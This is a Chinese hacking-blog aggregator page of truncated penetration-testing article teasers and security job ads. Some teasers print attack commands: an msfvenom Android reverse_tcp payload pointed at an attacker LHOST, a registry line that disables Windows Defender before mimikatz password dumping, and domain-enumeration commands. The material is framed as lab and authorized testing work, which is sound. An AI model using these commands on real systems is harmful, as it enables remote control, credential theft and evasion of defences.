记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

美团红队安全招聘人才!

美团红队安全招聘 1. 岗位要求: a. 统招本科或以上学历,至少2年以上的安全从业经验,能适应运营和运维工作; b. 具备扎实的计算机及安全技术基础(网络、系统、漏洞利用技术原理等方面); c. 具备网络攻防及应急响应的经验,具备较强的分析能力; d. 至少熟练掌握一门编程语言,并针对安全漏洞、防御绕过具备较强的exploit自制能力; e. 务实、自驱,具备良好的协调推动、沟通、团队合作能力。

白帽黑客教你Kali Linux:数据库密码脆弱性攻防演练下

一、课前声明1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali 与编程,学习更多网络攻防干货!3、Kali 与编程每天准时更新,敬请学习和关注!二、资源装备1.安装好 Kali Linux 的虚拟机一台2.搭建好Sql server的靶机一个;3.整装待发的小白一个。三、 战略安排3.1 进入Metasploit(msf)渗透测试框架,如下图所示。命令:msfconsole3.2 利用Metasploit(msf)渗透框架对目标主机漏洞利用模块进行检索,如下图所示。命令:search mssql_exec3.3 如下图所示,利用检索到的漏洞利用模块。
发布时间:2020-10-22 15:35 | 阅读:13954 | 评论:0 | 标签:渗透测试 linux 黑客 白帽 攻防

心动网络安全团队高薪招聘

公司介绍 我们是一支热爱游戏、热爱用户、充满个性的团队,也是一支有技术、有梦想、坚持初心的团队。自创业以来,我们坚信可以用科技与艺术,智慧与勇气,让世界变得更加有趣和美好。我们敢于颠覆,突破局限,只为还原游戏本身的乐趣,我们坚持探索,乐于创新,不断尝试去赋予游戏以新的形式。我们始终倾听玩家最真实的需求与心声,打造平等且纯粹的游戏社区,也同样不囿于游戏产业,始终致力于提供优质的综合娱乐服务体验。 招聘岗位 安全运营工程师岗位职责1、安全基础设施的建设与运营,如主机agent、SoC、木马检测、扫描系统、WAF、入侵检测、流量分析等;2、安全系统日志的分析,策略开发与运营;3、安全事件的应急处理。
发布时间:2020-10-09 15:25 | 阅读:264215 | 评论:0 | 标签:安全招聘 安全负责人 安全运营工程师 心动网络 招聘 渗透测试 高薪 网络安全 安全

白帽黑客与网络安全工程师教你:使用Metasploit进行FTP服务扫描

课前声明:1、本分享仅做学习交流,请自觉遵守法律法规!2、搜索:Kali与编程,学习更多网络攻防干货!3、Kali与编程每天准时更新,敬请学习和关注!3.1 在受害者Win2008 Server虚拟机配置防火墙(关闭防火墙),如下图所示。命令:Win+R/cmd/firewall.cpl3.2 在攻击方主机(Kali Linux主机)代开Postgresql数据库,如下图所示。命令:service postgresql start3.3 在攻击方Kali Linux主机打开Metasploit(msf)渗透框架,如下图所示。
发布时间:2020-10-01 13:46 | 阅读:23172 | 评论:0 | 标签:渗透测试 扫描 黑客 白帽 网络安全 安全

黑客破解wifi密码-超详细过程

前期准备VMware Workstation虚拟机在虚拟机安装好kail linunx系统无线网卡(芯片为3070或者1887L都支持Linux)一.打开终端,用airmon-ng命令查看如果出现无法访问
发布时间:2020-09-29 15:42 | 阅读:27503 | 评论:0 | 标签:渗透测试 黑客 破解

CISCN华东南赛区php健康宝wp&思考

前言 大家好,我是北京联合大学-小帽,也是本题的出题人。熟悉我的朋友们知道,平时喜欢做做欢乐杂项休闲休闲,所以这次的题目算是个披着web皮的半Misc。 由于微信小程序的开发简单、操作方便等优势,很多的公司、部门都喜欢制作小程序简化工作流程。在红蓝对抗、渗透测试等等场景,蓝队的信息中心可能会遗漏小程序这一边界(有可能是某个部门自己找外包做的,信息中心根本不知道它的存在)。而在程序开发过程中,开发者很容易信任某些用户输入,例如直接COPY官方文档中对麦克风、摄像头的操作而忘记了对上传的语音、视频检验。 另:复现可能会上BUUOJ,敬请期待。
发布时间:2020-09-28 12:57 | 阅读:19338 | 评论:0 | 标签:CTF agent CISCN php健康宝 SQL注入漏洞 渗透测试 靶机 PHP

从SQL注入到幸运域控

这是 酒仙桥六号部队 的第 37 篇文章。 全文共计2124个字,预计阅读时长8分钟。 背景 在某个午后,接到上级的任务需要对某个授权的目标进行渗透测试,于是磨刀霍霍向牛羊。 寻找突破口 由于这次给的目标范围很窄,只有两个域名跟两个IP,本来以为突破口不是那么好搞到,但拿到目标站点打开一看,心里稍微松了一口气,通过站点的氛围来看,应该是个运行很多年的系统了。
发布时间:2020-09-24 16:48 | 阅读:21868 | 评论:0 | 标签:内网渗透 asp木马 shell SQL注入 命令socks 哈希 域控 提权 渗透测试 甜土豆 隧道 注入 SQL

一次授权的渗透测试

前言一次正规且授权的测试,未使用任何扫描器,全程手工。这个客户呢是做的一个培训资料的商城。大概样子就是这样,其实当时拿到以后客户说不允许用任何扫描器,还有一点点懵。Thinkphp5.1.37 LTS 加 JQuery 1.7.2开始首先一个账户是必须要有的,难处在于因为验证码还在对接中,没法注册。只能要一个内置账户了。既然是thinkphp,习惯性的先试试runtime缓存目录看在不在。不存在。那么看看源代码直接访问static试试目录遍历,试了upload,js等等,也没有翻出一个有用的,那就进管理中心看看吧。首先是留言板随便提交了个图片,返回看详情。这里我开了抓包。
发布时间:2020-09-07 11:58 | 阅读:15391 | 评论:0 | 标签:渗透测试 渗透

xss平台搭建 创建项目没反映 解决办法

xss平台搭建 创建项目没反映解决办法最近有学员反映 第五章漏洞学习与挖掘18课 WEB安全第五章 漏洞学习与利用02xss利用平台搭建 提到的问题 问题原因?
发布时间:2020-09-03 00:26 | 阅读:22054 | 评论:0 | 标签:渗透测试 xss

来路不明的安装包请勿安装

前言本次渗透为靶机测试。切勿用于非法用途!攻击者:192.168.1.3 termux+metasploit受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)使用模块:multi/handler首先生成安卓木马msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk将其移动到/storage/emulated/0/360目录。并使用蓝牙发送给受害者者。受害者安装即可。回到攻击者,启动msfconsole。
发布时间:2020-09-01 10:04 | 阅读:10685 | 评论:0 | 标签:渗透测试

分享10个渗透测试最佳工具的使用方法及下载链接

渗透测试的目的不仅是找到安全系统的易受攻击元素,还要检查企业中安全策略的合规性,衡量任何安全问题的意识和范围,并查看可能性在真正的外部实体网络攻击事件中,网络可能会遇到什么灾难。实质上,渗透测试允许你发现可能没有考虑过的弱点区域。渗透测试者提供了一种全新的视角,帮助企业改进系统安全和采用更主动的方法。借助专业工具,渗透测试更加有效和高效,以下介绍10种最佳工具。
发布时间:2020-09-01 10:04 | 阅读:16086 | 评论:0 | 标签:渗透测试 渗透

白帽子黑客教你:如何使用Dirbuster网站目录扫描神器?

一、背景介绍DirBuster是用来探测web服务器上的目录和隐藏文件的。因为DirBuster是采用java编写的,所以运行前要安装上java的环境。 来看一下基本的使用: ①:TargetURL下输入要探测网站的地址,需要注意的是这个地址要加上协议,看网站是http还是https。 ②:WorkMethod是选择工作方式,一个是get请求,一个是自动选择。一般选autoswitch的自动选择,它会自行判断是使用head方式或get方式。 ③:NumberofThread是选择扫描线程数,一般为30。电脑配置好的可根据情况选择。 ④:selectscanningtype是选择扫描类型。
发布时间:2020-08-30 09:33 | 阅读:16637 | 评论:0 | 标签:渗透测试 扫描 黑客 白帽

渗透测试工具库

本地工具dirmap 子目录扫描https://gitee.com/c0ny10/dirmapsubDomainBrute 子域名扫描https://gitee.com/c0ny10/subDomainsBruteCknife WebShell管理工具https://gitee.com/c0ny10/cknifeJSFinde
发布时间:2020-08-30 09:33 | 阅读:24989 | 评论:0 | 标签:渗透测试 渗透

从Fastjson绕WAF到打穿网闸

这是 酒仙桥六号部队 的第 29 篇文章。 全文共计2160个字,预计阅读时长8分钟。 前言 记述一次授权测试中对某企业进行测试。 PS:渗透过程中的任何敏感信息均已做过脱敏处理,如有雷同,纯属巧合。 外网渗透 通过资产收集,发现了一个XX平台,验证码特别难识别,就没有了爆破的念头。 抓包看发现参数的传递使用了JSON格式。 祭出一个Fastjosn检测的poc,网站把报错页面做了隐藏,只能进行盲打。 把poc地址指向dnslog,查看是否能收到请求。 网站使用了防火墙,payload被拦截,通过修改编码的方式,查看能否绕过。
发布时间:2020-08-28 10:33 | 阅读:35702 | 评论:0 | 标签:脉搏文库 DNSLog fastjson FastJson反序列化漏洞 Maven NPS POC RMi环境 vps

Web渗透测试——验证码自动识别工具

我们在网站登录界面,为了安全起见,除了填写用户名和密码之外,还会要求用户输入验证码才能进行登录,验证码的作用最主要的是验证输入方是一个在电脑前正在输入的人,而不是某些程序模拟人的登录操作,这样就能有效地避免网站被攻击者进行暴力破解,从而非法获得网站的登录权限,验证码的种类也是多种多样的,其中我们常见的验证码就是图片验证码,验证码上的内容包括数字、字母、数字字母混合、汉字、算式等,这些字符往往都不太清晰,主要是为了增加识别难度,避免被软件自动识别。
发布时间:2020-08-22 21:25 | 阅读:26790 | 评论:0 | 标签:渗透测试 渗透 自动

域内特定目标渗透

一、获取域内信息 1 、列出该域内所有机器名 (dsquery computer domainroot -limit 65535 && net group “domain computers” /domain) 2 、列出该域内所有用户名 (dsquery
发布时间:2020-08-21 11:59 | 阅读:15868 | 评论:0 | 标签:渗透测试 渗透

Windows Server 2016抓取明文密码

临时禁止Windows Defender REG ADD "HKEY_LOCAL_MACHINESOFTWAREPoliciesMicrosoftWindows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f gpupdate /force 下载mimikatz后解压缩。 po
发布时间:2020-08-21 11:59 | 阅读:26771 | 评论:0 | 标签:渗透测试 windows

ZanTI v3.18全功能完美中文版【网络渗透】

简介这是一款安全测试工具,zANTI渗透测试,支持嗅探已连接的网络,来进行中间人攻击、端口扫描、cookie获取、路由安全、跑字典、抓包修改、远程控制、漏洞扫描、劫持等操作。该版本已汉化和免登录,需要root权限和busybox(瑞士小军刀),不可放vmos里运行哦。扫描网络功能开关最好玩的其实也是中间人,替代图片和重导向功能。假设小明正在看某二次元网站,当你使用了替代图片功能,成功劫持以后,便可换成是不是很奈斯,至于第二个功能的话emm,前提你得会建站才能恶搞,就不介绍了。
发布时间:2020-08-18 06:36 | 阅读:28725 | 评论:0 | 标签:渗透测试 渗透

铁头娃的渗透测试

这是 酒仙桥六号部队 的第 12 篇文章。 全文共计1268个字,预计阅读时长5分钟。 前言 争当好青年,疫情期间,坚决执行政府与公司的要求,无奈在家办公的我一如既往的接到了渗透测试的任务。 正篇 话不多说,开干。 01 信息搜集 老规矩,第一步先从信息搜集开始。 对目标进行子域名搜集,并没有发现子域名。 扫描网站目录文件,就一个后台登陆页面,其他什么都没有发现。 之后还进行了nmap端口扫描,也没有发现什么有价值的问题。 没办法,只能正面硬刚了。
发布时间:2020-08-17 17:05 | 阅读:27678 | 评论:0 | 标签:内网渗透 apk文件 Burp misc命令 Proxifier reGeog SQL注入 struts2 webshe

Bash远程解析命令执行漏洞

本文中使用的脚本仅限于学习交流,请勿非法使用,造成的一切后果,均由使用者承担,特此声明。最近在做护网前的内网测试准备,在测试过程中发现内网中存在大量的Bash远程解析命令执行漏洞,说实话这个漏洞有点陈旧了,但是对于渗透测试人员来说,这个漏洞是可以直接获取到目标服务的sehll,闲暇时间进行对此漏洞进行了再一次的复现,并编写了一个比较low的检测脚本和反弹shell的脚本。
发布时间:2020-08-16 19:29 | 阅读:19259 | 评论:0 | 标签:渗透测试 漏洞 远程 执行

黑客大神告诉你:Getshell总结

无论是常规渗透测试还是攻防对抗,亦或黑灰产对抗、APT攻击,getshell 是一个从内到外的里程碑成果。我们接下来总结下常见拿shell的一些思路和方法。文中可能有一些不足之处,还望大佬不吝赐教。
发布时间:2020-08-12 22:20 | 阅读:23241 | 评论:0 | 标签:渗透测试 黑客 shell

记一次渗透测试从XSS到Getshell过程(详细到无语)

0X00    前言 前段时间有幸和大佬们参加了一次一周的攻防演练,让我这个菜鸡体验到了红队的感觉。所以打算记录一下其中一个花了三天由xss存储到后台的踩坑过程,希望大佬们多带带。 0X01    钓鱼 到了攻防演练的第二天,早上有个同事和我说这边的一个目标存在存储xss,已经打回了cookie,但是对方开启了http-only无法利用,让我帮忙看看能不能进行钓鱼或者什么的。 于是我打开这个站看了一下登陆界面,把登陆界面扒了下来。
发布时间:2020-08-11 17:50 | 阅读:27414 | 评论:0 | 标签:内网渗透 csrf组合拳 Getshell top1w XSS 冰蝎 弱口令 攻防演练 渗透测试 爆破 红队 读取源码

机缘巧合之下拿下个发卡网还撸了把羊毛

0x01 事情经过 家乡群有个不是我们老家的广告狗天天发“出售微信抢红包软件”广告,发一次两次就算了,每天都发。最讨厌的是我在群里吹牛逼的时候他出来发广告?严重影响群内人员吹逼,十分可恶~,然后加了好友,居然发现这是我初中同学,在和他py一番了,他居然同意我对他的网站进行渗透测试,那就干就完事了,站长都同意授权了,开干 0x02 渗透过程 网站打开这个样子↓↓↓ 意外发现他还卖手机短信轰炸,电话轰炸的商品,必须干他啊! 随便点几个网页在参数的值后面加个'就找到个注入 SQLMap跑数据库没有发现后台管理员相关信息,陷入了沉思。
发布时间:2020-08-11 17:50 | 阅读:18065 | 评论:0 | 标签:内网渗透 PHP版 shell SQLMap跑数据库 SQL语句 宝塔 渗透测试 蚁剑连接

安全工程师-【贝壳找房】21届校招内推火热进行中

公司介绍: 贝壳找房创立于2018年初,定位于技术驱动的品质居住服务平台。贝壳找房致力于聚合和赋能全行业的优质服务者,打造开放合作的行业生态,为消费者提供包括二手房、新房、租赁和家装等全方位的居住服务。贝壳找房将继承和升级链家网在产品技术、品质控制和数据挖掘等方面的优势能力,继承和持续迭代大数据产品“楼盘字典”,研发和应用VR看房等创新技术手段,为消费者提供更好的服务体验。通过线上交易流程的可视化、线下的闭环服务和平台承诺,为消费者提供安全保障。

日常渗透测试搞站记录

DB2 数据库权限执行系统命令 记录一下拿到db2数据库权限之后,进行系统命令执行的过程,db2默认绑定的是50000端口: 1、创建一个临时的表 CREATE TABLE 数
发布时间:2020-07-24 02:11 | 阅读:26604 | 评论:0 | 标签:渗透测试 攻防演练 红蓝对抗 渗透

年度盘点 | 安全测试者偏爱的安全测试工具

1. Metasploit (免费) 2. Wifiphisher(免费) 1. John the Ripper (免费) 2. THC Hydra (免费) 3. Aircrack (免费) 1. Nmap (免费)  2. Net
发布时间:2020-07-17 20:07 | 阅读:29680 | 评论:0 | 标签:安全工具 mac os perl 工具 注入攻击 渗透测试 特别企划 端口扫描 系统安全 网络安全

MITM6:用IPv6攻陷IPv4网络的工具

WPAD利用的简短史 随着IPv6概念的提出,互联网上针对IPv6协议的使用也日渐增多,但即便如此IPv6在公司内部却并不受欢迎,很少会有公司使用IPv6。然而,大多数公司可能都忽略了一个问题,虽然IPv6可能没有被我们主动启用,但自Windows Vista以来的所有Windows版本(包括服务器版本)都默认启用了IPv6,并且优先级高于IPv4。 在本篇博文中,我将为大家介绍一种针对IPv6的攻击:即利用Windows网络中的默认IPv6配置,伪装DNS服务器来欺骗DNS reply,并将流量重定向到攻击者指定的端点。
发布时间:2020-07-17 20:07 | 阅读:19548 | 评论:0 | 标签:安全工具 ipv6协议 ipv6地址 工具 渗透测试

One-Lin3r:懒人的福音,渗透测试单行化工具

下载地址 演示视频 工具安装 工具运行截图 今天给大家介绍一款名叫One-Lin3r的渗透测试工具工具,这款工具可谓是“懒人”的福音,因为只需要输入一行命令,它就可以帮助我们完成渗透测试任务。 One-Lin3r One-Lin3r是一款简单的轻量级框架,而该工具的灵感来自于Metasploit的web-delivery模块。
发布时间:2020-07-17 20:07 | 阅读:19687 | 评论:0 | 标签:安全工具 工具 渗透测试 渗透

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云